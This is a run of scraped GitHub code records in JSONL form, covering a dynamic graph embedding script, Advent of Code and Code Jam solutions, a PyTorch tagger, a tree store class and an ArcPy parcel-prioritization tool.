'_samples' + str(sample),\n n_sample_nodes=sample\n )\n\n elif args.testDataType == 'enron':\n print(\"datatype:\", args.testDataType)\n\n files = [file for file in os.listdir('./test_data/enron') if 'month' in file]\n length = len(files)\n graphsall = []\n\n for i in range(length):\n G = nx.read_gpickle('./test_data/enron/month_' + str(i + 1) + '_graph.gpickle')\n graphsall.append(G)\n\n sample = graphsall[0].number_of_nodes()\n graphs = graphsall[-args.nsteps:]\n datafile = dataprep_util.prep_input_dynTriad(graphs, args.nsteps, args.testDataType)\n # pdb.set_trace()\n\n embedding = dynamicTriad(niters=args.niters,\n starttime=args.starttime,\n datafile=datafile,\n batchsize=100,\n nsteps=args.nsteps,\n embdim=args.embdim,\n stepsize=args.stepsize,\n stepstride=args.stepstride,\n outdir=args.outdir,\n cachefn=args.cachefn,\n lr=args.lr,\n beta=args.beta,\n negdup=args.negdup,\n datasetmod=args.datasetmod,\n trainmod=args.trainmod,\n pretrain_size=args.pretrain_size,\n sampling_args=args.sampling_args,\n validation=args.validation,\n datatype=args.testDataType,\n scale=args.scale,\n classifier=args.classifier,\n debug=args.debug,\n test=args.test,\n repeat=args.repeat,\n resultdir=args.resultdir,\n testDataType=args.testDataType,\n clname='lr',\n node_num=sample\n\n )\n\n embedding.learn_embedding()\n embedding.get_embedding()\n\n outdir = args.resultdir\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n outdir = outdir + '/' + args.testDataType\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n\n outdir = outdir + '/dynTriad'\n if not 
os.path.exists(outdir):\n os.mkdir(outdir)\n\n lp.expstaticLP_TRIAD(None,\n graphs,\n embedding,\n 1,\n outdir + '/',\n 'l' + str(args.nsteps) + '_emb' + str(args.embdim) + '_samples' + str(sample),\n n_sample_nodes=sample\n )\n","repo_name":"palash1992/DynamicGEM","sub_path":"dynamicgem/embedding/dynamicTriad.py","file_name":"dynamicTriad.py","file_ext":"py","file_size_in_byte":39541,"program_lang":"python","lang":"en","doc_type":"code","stars":335,"dataset":"github-code","pt":"61"} +{"seq_id":"18484931145","text":"import os\nimport sys\nimport copy\n\npuzzle_input_path = os.path.join(os.path.dirname(__file__), \"input_1.txt\")\n\nwith open(puzzle_input_path) as puzzle_input_file:\n puzzle_input_raw = puzzle_input_file.read()\n\n# parse the boot code\nboot_code = [x.split() for x in puzzle_input_raw.splitlines()]\n\n\ndef run(boot_code):\n accumulator = 0\n visited = set()\n current_idx = 0\n\n while current_idx not in visited and current_idx < len(boot_code):\n instruction = boot_code[current_idx]\n visited.add(current_idx)\n if instruction[0] == \"acc\":\n accumulator += int(instruction[1])\n current_idx += 1\n elif instruction[0] == \"jmp\":\n current_idx += int(instruction[1])\n else:\n current_idx += 1\n\n return current_idx not in visited, accumulator\n\n\n# brute force the shit\nfor idx, instruction in enumerate(boot_code):\n copied_boot_code = copy.deepcopy(boot_code)\n if instruction[0] == \"nop\":\n copied_boot_code[idx][0] = \"jmp\"\n elif instruction[0] == \"jmp\":\n copied_boot_code[idx][0] = \"nop\"\n else:\n continue\n\n is_terminated, accumulator = run(copied_boot_code)\n if is_terminated:\n print(f\"Boot Code terminated with changed {instruction[0]} to {copied_boot_code[idx][0]} at {idx} - Accumulator is: {accumulator}\")\n break","repo_name":"timofurrer/aoc","sub_path":"2020/08/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15140610164","text":"from torch import Tensor\nimport torch\nfrom torch import nn\nfrom torch import optim\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms, models\nfrom torch.autograd import Variable\nimport torch.optim as optim\nimport numpy as np\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nprint(device)\n\nX_train = open('src-train.txt').read().split('\\n')\nX_test = open('src-test.txt').read().split('\\n')\ny_train = open('tgt-train.txt').read().split('\\n')\ny_test = open('tgt-test.txt').read().split('\\n')\n\ntokens = set([])\nfor sentence in X_train+X_test:\n for word in sentence.split(' '):\n tokens.add(word)\ntokens = list(tokens)\ntokens.append('')\ntokens.append('')\nnum_tokens = len(tokens)\nprint(num_tokens)\n\ntag_list = set([])\nfor sentence in y_train+y_test:\n for tag in sentence.split(' '):\n tag_list.add(tag)\ntag_list = list(tag_list)\nnum_tags = len(tag_list)\nprint(num_tags) \n \ndef get_one_hot(word):\n one_hot = torch.zeros(num_tokens)\n one_hot[tokens.index(word)] = 1\n return one_hot\n\ndef get_tag(tag):\n return tag_list.index(tag)\n\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.fc1 = nn.Linear(num_tokens, 1000)\n self.fc2 = nn.Linear(3 * num_tags, num_tags)\n self.fc3 = nn.Linear(1000,num_tags)\n \n def forward(self,x,x_1,x_2):\n x = Variable(x.T)\n x = self.fc1(x)\n x = F.relu(x)\n x = F.relu(self.fc3(x))\n \n x_1 = Variable(x_1.T)\n x_1 = self.fc1(x_1)\n x_1 = F.relu(x_1)\n x_1 = 
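The boot-code interpreter in part2.py above can be sanity-checked against the worked example from the puzzle text. A self-contained restatement of `run` plus the jmp-to-nop patch that makes the example halt (instruction list copied from the puzzle statement):

def run(boot_code):
    acc, visited, idx = 0, set(), 0
    while idx not in visited and idx < len(boot_code):
        op, arg = boot_code[idx]
        visited.add(idx)
        if op == "acc":
            acc += int(arg)
            idx += 1
        elif op == "jmp":
            idx += int(arg)
        else:
            idx += 1
    return idx not in visited, acc   # (terminated?, accumulator)

example = [line.split() for line in [
    "nop +0", "acc +1", "jmp +4", "acc +3", "jmp -3",
    "acc -99", "acc +1", "jmp -4", "acc +6"]]
print(run(example))        # (False, 5): loops with accumulator 5
example[7][0] = "nop"      # patch the offending jmp at index 7
print(run(example))        # (True, 8): terminates with accumulator 8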
F.relu(self.fc3(x_1))\n \n x_2 = Variable(x_2.T)\n x_2 = self.fc1(x_2)\n x_2 = F.relu(x_2)\n x_2 = F.relu(self.fc3(x_2))\n \n x_com = torch.cat((x, x_1, x_2), 0)\n final = F.softmax(self.fc2(x_com))\n return final\n \nnet = Net()\nnet = net.float()\nnet.to(device)\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.Adam(net.parameters())\n\nfor epoch in range(10):\n running_loss = 0.0\n for i in range(len(X_train)):\n# try:\n print(i, end=\" \")\n optimizer.zero_grad()\n words = X_train[i].split(' ')\n words.append('')\n words.insert(0,'')\n tags = y_train[i].split(' ')\n a = []\n for j in range(1,len(words)-1):\n x = get_one_hot(words[j]).to(device)\n x_1 = get_one_hot(words[j+1]).to(device)\n x_2 = get_one_hot(words[j-1]).to(device)\n a.append(net(x,x_1,x_2))\n out = torch.stack(a)\n out.to(device)\n b = [get_tag(tag) for tag in tags]\n res = torch.tensor(b)\n res = res.cuda()\n loss = torch.tensor(0)\n loss.to(device)\n loss = criterion(out,res)\n loss.to(device)\n\n print(running_loss)\n loss.backward()\n optimizer.step()\n running_loss += loss.item()\n# except:\n# continue\nprint('Finished Training')\n\ndef predict_tag(probs):\n values, indices = torch.max(probs,0)\n return tag_list[indices]\n\nf = open('out.txt','w')\nwith torch.no_grad():\n for i in range(len(X_test)):\n words = X_test[i].split(' ')\n words.append('')\n words.insert(0,'')\n tags = y_test[i].split(' ')\n a = []\n for j in range(1,len(words)-1):\n x = get_one_hot(words[j]).to(device)\n x_1 = get_one_hot(words[j+1]).to(device)\n x_2 = get_one_hot(words[j-1]).to(device)\n a.append(net(x,x_1,x_2)) \n for j in range(len(a)):\n f.write(predict_tag(a[j])+\" \")\n f.write(\"\\n\")\nf.close()\n\nout = open('out.txt').read().split('\\n')\nerror = 0\ntotal = 0\nfor i in range(len(y_test)):\n print(i)\n out_tags = out[i].split(' ')\n target_tags = y_test[i].split(' ')\n for j in range(len(target_tags)):\n print(out_tags[j],target_tags[j])\n if(out_tags[j]!=target_tags[j]):\n error+=1\n total+=1\nprint(error)\nprint(total)\nprint((total-error)/total)","repo_name":"abhigyanghosh30/6th-Semester","sub_path":"Linguistics Data 2/Assignment4/classification.py","file_name":"classification.py","file_ext":"py","file_size_in_byte":4031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6937401369","text":"class TreeStore:\n def __init__(self, items):\n self.items = items\n\n @property\n def getAll(self):\n return self.items\n\n def getItem(self, id):\n for item in items:\n if item[\"id\"] == id:\n return item\n\n def getChildren(self, parent):\n new_items = []\n for item in self.items:\n if item[\"parent\"] == parent:\n new_items.append(item)\n return new_items\n\n def getAllParents(self, child):\n new_items1 = []\n\n def getParent(parent, new_items2):\n for item_ in new_items2:\n if item_[\"id\"] == parent:\n new_items1.append(item_)\n getParent(item_[\"parent\"], new_items2)\n break\n\n for item in self.items:\n if item[\"id\"] == child:\n getParent(item[\"parent\"], self.items)\n return new_items1\n\n\nitems = [\n {\"id\": 1, \"parent\": \"root\"},\n {\"id\": 2, \"parent\": 1, \"type\": \"test\"},\n {\"id\": 3, \"parent\": 1, \"type\": \"test\"},\n {\"id\": 4, \"parent\": 2, \"type\": \"test\"},\n {\"id\": 5, \"parent\": 2, \"type\": \"test\"},\n {\"id\": 6, \"parent\": 2, \"type\": \"test\"},\n {\"id\": 7, \"parent\": 4, \"type\": None},\n {\"id\": 8, \"parent\": 4, \"type\": None},\n]\nts = TreeStore(items)\n\nif __name__ == \"__main__\":\n print(ts.getAll)\n 
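Feeding one-hot vectors through fc1 in the tagger above is mathematically an embedding lookup; nn.Embedding computes the same result without materialising num_tokens-sized vectors, which matters once the vocabulary grows. A check of the equivalence (bias disabled to make it exact; the sizes are toy assumptions):

import torch
from torch import nn

num_tokens, hidden = 1000, 64
fc1 = nn.Linear(num_tokens, hidden, bias=False)
emb = nn.Embedding(num_tokens, hidden)
emb.weight.data.copy_(fc1.weight.t())          # share the same parameters

one_hot = torch.zeros(1, num_tokens)
one_hot[0, 42] = 1.0
print(torch.allclose(fc1(one_hot), emb(torch.tensor([42]))))   # True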
print(ts.getItem(7))\n print(ts.getChildren(4))\n print(ts.getChildren(5))\n print(ts.getAllParents(7))\n","repo_name":"Stanis96/test_for_status","sub_path":"task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70576694915","text":"# O(n) time | O(1) space\n\nclass Solution:\n @staticmethod\n def canCompleteCircuit(gas: List[int], cost: List[int]) -> int:\n if sum(gas) < sum(cost):\n return -1\n \n total = 0\n res = 0\n\n for i in range(len(gas)):\n total += (gas[i] - cost[i])\n\n if total < 0:\n total = 0\n res = i + 1\n \n return res\n\ngas = [1,2,3,4,5]\ncost = [3,4,5,1,2]\nassert Solution.canCompleteCircuit(gas, cost) == 3\n","repo_name":"akashsonowal/ml-foundations","sub_path":"ml_foundations/ops_utils/coding_toolkit/data_structures_and_algorithms/greedy/gas_station.py","file_name":"gas_station.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"7077819238","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n\r\nName: Parcel Prioritization Tool\r\nPurpose: Given a shapefile of parcels and an input table of criteria, \r\n weights, and ranks, this toolbox will calculate a prioritization \r\n score of each parcel, rank the parcels by score, and generate a \r\n rank-sorted parcel table.\r\n \r\nCreated on Thu Dec 27 09:14:07 2018\r\n\r\n@author: cspence\r\n\"\"\"\r\n\r\n# set environments, etc\r\n\r\nimport arcpy\r\nfrom arcpy import env\r\nimport xlrd\r\nimport numpy as np\r\nfrom numpy.lib.recfunctions import rec_append_fields\r\nimport os\r\n\r\nmxd = arcpy.mapping.MapDocument(\"CURRENT\")\r\n\r\nworkspace = arcpy.GetParameterAsText(0)\r\nworkspace = 'K:\\\\DataServices\\\\Projects\\\\Current_Projects\\\\Environment\\\\Neponset\\\\IDDE_Task_FY19\\BMP_Prioritization\\\\Data\\\\Spatial\\\\ParcelDB_creation.gdb'\r\narcpy.env.workspace = workspace\r\n\r\n# Assemble layers\r\nparcels = arcpy.GetParameterAsText(1) # This is the \"MA Land Parcel Database:\r\n # Stormwater Edition\" created by running\r\n # the load_calc, nutrientmuni_pctile, and \r\n # parcel_combine\r\n#parcels = 'K:\\\\DataServices\\\\Projects\\\\Current_Projects\\\\Environment\\\\Neponset\\\\IDDE_Task_FY19\\BMP_Prioritization\\\\Data\\\\Spatial\\\\ParcelDB_creation.gdb\\\\Parcels_withnutrientpctiles'\r\n \r\ntable = arcpy.GetParameterAsText(2) # This table includes categorizations,\r\n # weights, and ranks of each criterion\r\n#table = 'K:\\\\DataServices\\\\Projects\\\\Current_Projects\\\\Environment\\\\Neponset\\\\IDDE_Task_FY19\\BMP_Prioritization\\\\Data\\\\Tabular\\\\entry_template_TN_20200_04_30.xlsx'\r\n \r\ntheme = arcpy.GetParameterAsText(3) # Short (ideally < 3 character) descriptive \r\n # string identifying priority theme\r\n#theme = 'TN'\r\n \r\n\r\n\r\n \r\n'''\r\nDefine useful functions\r\n'''\r\n\r\ndef AutoName(table): \r\n # function that automatically names a feature class or raster\r\n # Adapted from MAPC's stormwater toolkit script at https://github.com/MAPC/stormwater-toolkit/blob/master/Burn_Raster_Script.py\r\n \r\n checktable = arcpy.Exists(table) # checks to see if the raster already exists\r\n count = 2\r\n newname = table\r\n\r\n while checktable == True: # if the raster already exists, adds a suffix to the end and checks again\r\n newname = table + str(count)\r\n count += 1\r\n checktable = arcpy.Exists(newname)\r\n\r\n return newname\r\n\r\ndef unique_values(table, 
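TreeStore above rescans the full item list on every lookup. Building two indexes once makes getItem O(1), turns getChildren into a dictionary hit, and reduces getAllParents to a pointer walk. A sketch under the same item schema (id / parent keys):

from collections import defaultdict

class IndexedTreeStore:
    def __init__(self, items):
        self.items = items
        self.by_id = {item["id"]: item for item in items}
        self.by_parent = defaultdict(list)
        for item in items:
            self.by_parent[item["parent"]].append(item)

    def getItem(self, id):
        return self.by_id.get(id)

    def getChildren(self, parent):
        return self.by_parent.get(parent, [])

    def getAllParents(self, child):
        out, cur = [], self.by_id.get(child)
        while cur and cur["parent"] in self.by_id:
            cur = self.by_id[cur["parent"]]
            out.append(cur)
        return out

store = IndexedTreeStore([{"id": 1, "parent": "root"},
                          {"id": 2, "parent": 1},
                          {"id": 3, "parent": 2}])
print([i["id"] for i in store.getAllParents(3)])   # [2, 1]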
field):\r\n # Function from http://geospatialtraining.com/get-a-list-of-unique-attribute-values-using-arcpy/\r\n with arcpy.da.SearchCursor(table, [field]) as cursor:\r\n return sorted({row[0] for row in cursor})\r\n\r\n \r\ndef join_table_shapefile(table, tablefield, shapefile, shapefield, outputname):\r\n # Function to join a table to a shapefile, resulting in a hard-copy shapefile with attributes from the table\r\n \r\n # Join luloadtable to bmpparcels to get code from 3-12\r\n shape_layer = AutoName(shapefile + '_table')\r\n arcpy.MakeFeatureLayer_management(shapefile, shape_layer, workspace = workspace)\r\n \r\n # Add a join from the pollutant-relevant land use type to parcel database\r\n temp_join = arcpy.AddJoin_management(shape_layer, shapefield, table, tablefield, 'KEEP_ALL')\r\n arcpy.CopyFeatures_management(temp_join, outputname)\r\n\r\n return(outputname)\r\n \r\ndef calc_catscr(parcels, fieldname, cattype, threshs, weights):\r\n \r\n# print(fieldname)\r\n \r\n def findindex(table, fieldname):\r\n ''' Function from https://gis.stackexchange.com/questions/101540/finding-the-index-of-a-field-with-its-name-using-arcpy\r\n to find the index of a table's fields from the field name '''\r\n return [i.name for i in arcpy.ListFields(table)].index(fieldname)\r\n\r\n num_groups = len(threshs)\r\n threshs = [str(t) for t in threshs]\r\n \r\n # Add a new field for the categorization score\r\n scrname = fieldname + '_scr'\r\n arcpy.AddField_management(parcels, scrname, 'DOUBLE')\r\n \r\n # Go through and calculate new value based on original score and table cats\r\n fields = [fieldname, scrname]\r\n with arcpy.da.UpdateCursor(parcels, fields) as cursor:\r\n for row in cursor:\r\n if cattype == 'categorical':\r\n threshs = [str(t) for t in threshs]\r\n if num_groups >= 2:\r\n if row[0] == threshs[0]:\r\n row[1] = weights[0]\r\n elif row[0] == threshs[1]:\r\n row[1] = weights[1]\r\n \r\n if num_groups > 2:\r\n if row[0] == threshs[2]:\r\n row[1] = weights[2]\r\n else:\r\n pass\r\n \r\n if num_groups > 3:\r\n if row[0] == threshs[3]:\r\n row[1] = weights[3]\r\n else:\r\n pass\r\n \r\n if num_groups > 4:\r\n if row[0] == threshs[4]:\r\n row[1] = weights[4]\r\n else:\r\n pass\r\n \r\n if num_groups > 5:\r\n if row[0] == threshs[5]:\r\n row[1] = weights[5]\r\n else:\r\n pass\r\n \r\n if num_groups > 6:\r\n if row[0] == threshs[6]:\r\n row[1] = weights[6]\r\n else:\r\n pass\r\n \r\n if num_groups > 7:\r\n if row[0] == threshs[7]:\r\n row[1] = weights[7]\r\n else:\r\n pass\r\n \r\n if num_groups > 8:\r\n if row[0] == threshs[8]:\r\n row[1] = weights[8]\r\n else:\r\n pass\r\n else: # Pair: if 8\r\n pass\r\n else: # Pair: if 7\r\n pass\r\n else: # Pair: if 6\r\n pass \r\n else: # Pair: if 5\r\n pass\r\n else: # Pair: if 4\r\n pass\r\n else: # Pair: if 3\r\n pass\r\n else: # Pair: if 2\r\n pass\r\n else:\r\n arcpy.AddMessage('ERROR: Criterion must have at least two categories')\r\n \r\n elif cattype == 'numeric':\r\n threshs = [float(t) for t in threshs]\r\n if num_groups == 2:\r\n if row[0] > threshs[0]:\r\n row[1] = weights[0]\r\n# print(weights[0])\r\n else:\r\n row[1] = weights[1]\r\n# print(weights[1])\r\n elif num_groups == 3:\r\n if row[0] > threshs[0]:\r\n row[1] = weights[0]\r\n elif row[0] > threshs[1]:\r\n row[1] = weights[1]\r\n else:\r\n row[1] = weights[2]\r\n elif num_groups == 4:\r\n if row[0] > threshs[0]:\r\n row[1] = weights[0]\r\n elif row[0] > threshs[1]:\r\n row[1] = weights[1]\r\n elif row[0] > threshs[2]:\r\n row[1] = weights[2]\r\n else:\r\n row[1] = weights[3]\r\n elif 
num_groups == 5:\r\n if row[0] > threshs[0]:\r\n row[1] = weights[0]\r\n elif row[0] > threshs[1]:\r\n row[1] = weights[1]\r\n elif row[0] > threshs[2]:\r\n row[1] = weights[2]\r\n elif row[0] > threshs[3]:\r\n row[1] = weights[3]\r\n else:\r\n row[1] = weights[4]\r\n elif num_groups == 6:\r\n if row[0] > threshs[0]:\r\n row[1] = weights[0]\r\n elif row[0] > threshs[1]:\r\n row[1] = weights[1]\r\n elif row[0] > threshs[2]:\r\n row[1] = weights[2]\r\n elif row[0] > threshs[3]:\r\n row[1] = weights[3]\r\n elif row[0] > threshs[4]:\r\n row[1] = weights[4]\r\n else:\r\n row[1] = weights[5]\r\n elif num_groups == 7:\r\n if row[0] > threshs[0]:\r\n row[1] = weights[0]\r\n elif row[0] > threshs[1]:\r\n row[1] = weights[1]\r\n elif row[0] > threshs[2]:\r\n row[1] = weights[2]\r\n elif row[0] > threshs[3]:\r\n row[1] = weights[3]\r\n elif row[0] > threshs[4]:\r\n row[1] = weights[4]\r\n elif row[0] > threshs[5]:\r\n row[1] = weights[5]\r\n else:\r\n row[1] = weights[6]\r\n elif num_groups == 8:\r\n if row[0] > threshs[0]:\r\n row[1] = weights[0]\r\n elif row[0] > threshs[1]:\r\n row[1] = weights[1]\r\n elif row[0] > threshs[2]:\r\n row[1] = weights[2]\r\n elif row[0] > threshs[3]:\r\n row[1] = weights[3]\r\n elif row[0] > threshs[4]:\r\n row[1] = weights[4]\r\n elif row[0] > threshs[5]:\r\n row[1] = weights[5]\r\n elif row[0] > threshs[6]:\r\n row[1] = weights[6]\r\n else:\r\n row[1] = weights[7]\r\n else:\r\n arcpy.AddMessage('ERROR: Number of thresholds is not an integer between 1 and 8')\r\n \r\n elif cattype == 'binary':\r\n threshs = [str(t) for t in threshs]\r\n if row[0] is None or row[0] == ' ' or row[0] == 0:\r\n row[1] = weights[0]\r\n else:\r\n row[1] = weights[1]\r\n else:\r\n arcpy.AddMessage('ERROR: Category type (cattype) not recognized. Type must be \"binary\", \"categorical\", or \"numeric.\" Check for typos or capitalization errors.')\r\n cursor.updateRow(row)\r\n \r\n return(scrname)\r\n \r\ndef prioritize_parcels(parcels, fieldnames, scrnames, field_weight, soilind):\r\n ''' Updates \"parcels\".'''\r\n \r\n # Add a new field for the categorization score\r\n arcpy.AddField_management(parcels, 'pri_scr', 'DOUBLE')\r\n \r\n # Calculate normalized weights\r\n total_weight = np.sum(field_weight)\r\n \r\n namelist = list()\r\n soillist = list()\r\n \r\n # Calculate the normalized weight for all criteria\r\n for k in range(len(fieldnames)):\r\n if field_weight[k] == 0:\r\n pass\r\n else:\r\n # # Add a weight field and normalize by total weight\r\n # wtfld = str(fieldnames[k]) + '_wt'\r\n # # soillist.append(soilind[k])\r\n # namelist.append(wtfld)\r\n # expr_type = \"PYTHON\"\r\n # expr = str(field_weight[k]) + '*(1.0/' + str(total_weight) + ')'\r\n # arcpy.AddField_management(parcels, wtfld, 'DOUBLE')\r\n # arcpy.CalculateField_management(parcels, wtfld, expr, expr_type)\r\n # Add a weight field\r\n wtfld = str(fieldnames[k]) + '_wt'\r\n # soillist.append(soilind[k])\r\n namelist.append(wtfld)\r\n expr_type = \"PYTHON\"\r\n expr = str(field_weight[k])\r\n arcpy.AddField_management(parcels, wtfld, 'DOUBLE')\r\n arcpy.CalculateField_management(parcels, wtfld, expr, expr_type)\r\n \r\n arcpy.AddMessage(str(namelist))\r\n arcpy.AddMessage(str(soillist))\r\n \r\n # add prioritization field\r\n expr_pri = ''\r\n expr_soil = 'max(['\r\n for k in range(len(namelist)):\r\n if soilind[k]:\r\n # If a soil field, add to the list of soil fields.\r\n expr_soil = expr_soil + '!' + scrnames[k] + '!*!' 
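The numeric branch of calc_catscr above enumerates every group count from 2 to 8 by hand. The same descending-threshold lookup ("the first threshold the value exceeds wins") can be expressed once with bisect, for any number of groups. A sketch, assuming the thresholds are sorted descending and there is one more weight than thresholds, as in the entry table:

import bisect

def score_numeric(value, threshs_desc, weights):
    # len(weights) == len(threshs_desc) + 1; the last weight is the
    # catch-all for values at or below the smallest threshold.
    asc = sorted(threshs_desc)
    return weights[len(asc) - bisect.bisect_left(asc, value)]

print(score_numeric(75, [90, 70, 50], [3, 2, 1, 0]))   # 2  (70 < 75 <= 90)
print(score_numeric(70, [90, 70, 50], [3, 2, 1, 0]))   # 1  (ties fall through, matching the strict '>')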
+ namelist[k] + '!, '\r\n else:\r\n # If not, add to the calculation.\r\n expr_pri = expr_pri + ' + ' + '!' + scrnames[k] + '!*!' + namelist[k] + '!'\r\n \r\n # Done with list: Take max of soil fields.\r\n \r\n expr_soil = expr_soil[:-2] # Strip last comma and space\r\n expr_soil = expr_soil + '])'# Conclude the \"Max\"\r\n if sum(soilind) == 0: \r\n # If all soils weighted 0, don't add them to score.\r\n expr_pri = expr_pri[3:] # Strip ' + ' from front of expr_pri.\r\n else:\r\n expr_pri = expr_pri[3:] # Strip ' + ' from front of expr_pri.\r\n expr_pri = expr_pri + ' + ' + expr_soil\r\n\r\n arcpy.AddMessage(expr_pri)\r\n arcpy.CalculateField_management(parcels, 'pri_scr', expr_pri, expr_type)\r\n \r\n # remove unneeded fields\r\n for k in range(len(namelist)):\r\n arcpy.DeleteField_management(parcels, namelist[k])\r\n \r\n return()\r\n \r\ndef categorizebmp(parcellyr, table):\r\n # Function to convert original values of criteria in parcel database to \r\n # score-relevant values based on user-defined table\r\n \r\n numcats = arcpy.GetCount_management(table)\r\n numcats = int(numcats[0])\r\n \r\n cols = [[r[0] for r in arcpy.da.SearchCursor(table, field.name)] for field in arcpy.ListFields(table)]\r\n# inds = cols[0]\r\n# criteria = cols[1]\r\n field_name = cols[2]\r\n field_weight = cols[3]\r\n num_groups = cols[4]\r\n cat_type = cols[5]\r\n threshs = np.concatenate([np.array(i) for i in cols[6:15]])\r\n threshs = np.reshape(threshs, (numcats, 9), order = 'F') # use rows-first indexing (Fortran-like)\r\n \r\n weights = np.concatenate([np.array(i) for i in cols[15:]])\r\n weights = np.reshape(weights, (numcats, 9), order = 'F') # Fortran-like indexing\r\n \r\n # Ensure soils correctly accounted for\r\n scrnames = list()\r\n numsoils = np.zeros(numcats, dtype = bool)\r\n deleteinds = list()\r\n for k in range(numcats):\r\n weight = field_weight[k] \r\n if weight == 0:\r\n deleteinds.append(k)\r\n else: # Calculate categories for that field\r\n fieldname = str(field_name[k])\r\n if fieldname.startswith('hsg'): numsoils[k] = True\r\n arcpy.AddMessage(fieldname + ' ' + str(numsoils[k]))\r\n cattype = str(cat_type[k])\r\n ngroups = num_groups[k]\r\n threshs_crit = threshs[k,0:ngroups]\r\n weights_crit = weights[k,0:ngroups]\r\n scrname = calc_catscr(parcellyr, fieldname, cattype, threshs_crit, weights_crit)\r\n scrnames.append(scrname)\r\n \r\n numsoils = np.delete(numsoils, deleteinds)\r\n \r\n # scrnames = np.asarray(scrnames) # Convert to a numpy array for easier handling.\r\n # soilscores = np.multiply(scrnames, numsoils) # Multiply by array with 1 at soil scores to convert others to 0\r\n # maxind = np.max(soilscores) # Get index where highest absolute value score is located\r\n # arcpy.AddMessage(str(soilscores))\r\n # arcpy.AddMessage(str(maxind))\r\n # numsoils = numsoils - maxind # Convert the array indexing soil scores to indexing soil scores we do not want to keep\r\n # keepinds = numsoils == False # Invert that array so that it indexes all the scores (not just soil scores) we DO want to keep\r\n # scrnames = np.multiply(scrnames, keepinds) # Multiply previous array element-wise by previous so that only one soil score remains alongside other scores\r\n \r\n # # Convert back to a list.\r\n # scrnames = scrnames.tolist()\r\n \r\n prioritize_parcels(parcellyr, field_name, scrnames, field_weight, numsoils) # Adds prioritization score to each parcel\r\n \r\n return()\r\n \r\ndef importallsheets(in_excel, out_gdb):\r\n # Function taken from ESRI documentation 
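categorizebmp above concatenates nine per-column arrays and reshapes with order='F' so that row k again carries the nine thresholds of criterion k; column-major (Fortran-like) order is exactly what lines the columns back up. A two-criteria toy demonstration:

import numpy as np

cols = [np.array([1, 2]), np.array([10, 20]), np.array([100, 200])]  # 3 columns, 2 criteria
table = np.reshape(np.concatenate(cols), (2, 3), order="F")
print(table)
# [[  1  10 100]
#  [  2  20 200]]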
http://pro.arcgis.com/en/pro-app/tool-reference/conversion/excel-to-table.htm\r\n workbook = xlrd.open_workbook(in_excel)\r\n sheets = [sheet.name for sheet in workbook.sheets()]\r\n\r\n print('{} sheets found: {}'.format(len(sheets), ','.join(sheets)))\r\n for sheet in sheets:\r\n # The out_table is based on the input excel file name\r\n # a underscore (_) separator followed by the sheet name\r\n out_table = os.path.join(\r\n out_gdb,\r\n arcpy.ValidateTableName(\r\n \"{0}_{1}\".format(os.path.basename(in_excel), sheet),\r\n out_gdb))\r\n\r\n print('Converting {} to {}'.format(sheet, out_table))\r\n\r\n # Perform the conversion\r\n arcpy.ExcelToTable_conversion(in_excel, out_table, sheet)\r\n return()\r\n \r\n \r\n'''\r\n\r\nBegin the Calculations\r\n\r\n'''\r\n# 0. Convert excel table to esri table\r\nentrytable = AutoName('entryform')\r\nresult = arcpy.ExcelToTable_conversion(table, entrytable, \"Data_Entry\")\r\nentrytable = result.getOutput(0)\r\n\r\n\r\n# 1. Select records from only desired muni\r\n# Get town names from \"townpolys\" feature class\r\ntownnames = unique_values(parcels, 'muni')\r\ntownnames = [x.title() for x in townnames]\r\ntownnames_caps = [x.upper() for x in townnames]\r\n\r\nmuniparcelnames = list()\r\nfor k in range(len(townnames_caps)):\r\n muni = townnames[k]\r\n muniname = AutoName('parcels' + muni)\r\n arcpy.Select_analysis(parcels, muniname, \"muni = '\" + muni + \"'\")\r\n arcpy.AddMessage(\"Working with \" + muni + \" parcels\")\r\n\r\n # 2. Calculate scores for each criterion by threshold\r\n outname = AutoName('bmpcats_' + muniname)\r\n categorizebmp(muniname, entrytable) #outname\r\n arcpy.AddMessage(\"Categorized \" + muni + \" bmp criteria\")\r\n\r\n # 3. Calculate percentiles, sort, and export to table\r\n parceltable = arcpy.da.TableToNumPyArray(muniname, '*', null_value = 0)\r\n\r\n nparcels = len(parceltable['pri_scr'])\r\n pripct = list()\r\n for j in range(nparcels):\r\n pripct.append(1.0 - (np.sum(parceltable['pri_scr'] > parceltable['pri_scr'][j])/float(nparcels)))\r\n \r\n new_table = rec_append_fields(parceltable, 'pri_pct', data = pripct, dtypes = ' 1) and changed:\n a = lst[-1]\n b = lst[-2]\n changed = False\n for comb in combinations:\n if comb[0] == a:\n if comb[1] == b:\n lst.pop()\n lst.pop()\n lst.append(comb[2])\n changed = True\n break;\n if comb[0] == b:\n if comb[1] == a:\n lst.pop()\n lst.pop()\n lst.append(comb[2])\n changed = True\n break\n \n return lst\n \ndef check(oppos, lst):\n for items in oppos:\n if (items[0] in lst) and (items[1] in lst):\n return []\n return lst\n \n\ndef solve(data):\n result = []\n for i in data[2]:\n result.append(i)\n result = combine(data[0], result)\n result = check(data[1], result)\n return \"[\" + \", \".join([\"%c\" % i for i in result]) + \"]\"\n \n######################## Template ########################\n\ndef problem(fin):\n items = fin.readline().strip('\\n').split(' ')\n items.reverse()\n comb = []\n for i in xrange(int(items.pop())):\n comb.append(items.pop())\n oppos = []\n for i in xrange(int(items.pop())):\n oppos.append(items.pop())\n i = items.pop()\n lst = items.pop()\n return (comb, oppos, lst)\n \nif __name__ == '__main__':\n from sys import argv\n \n fin = open(argv[1])\n fout = open(argv[1].replace(\"in\", \"out\"), \"w\")\n \n numLines = int(fin.readline())\n problem_list = [problem(fin) for i in range(numLines)]\n \n solution_list = map(solve, problem_list)\n\n for i, s in enumerate(solution_list):\n fout.write(\"Case #%s: %s\\n\" % (i + 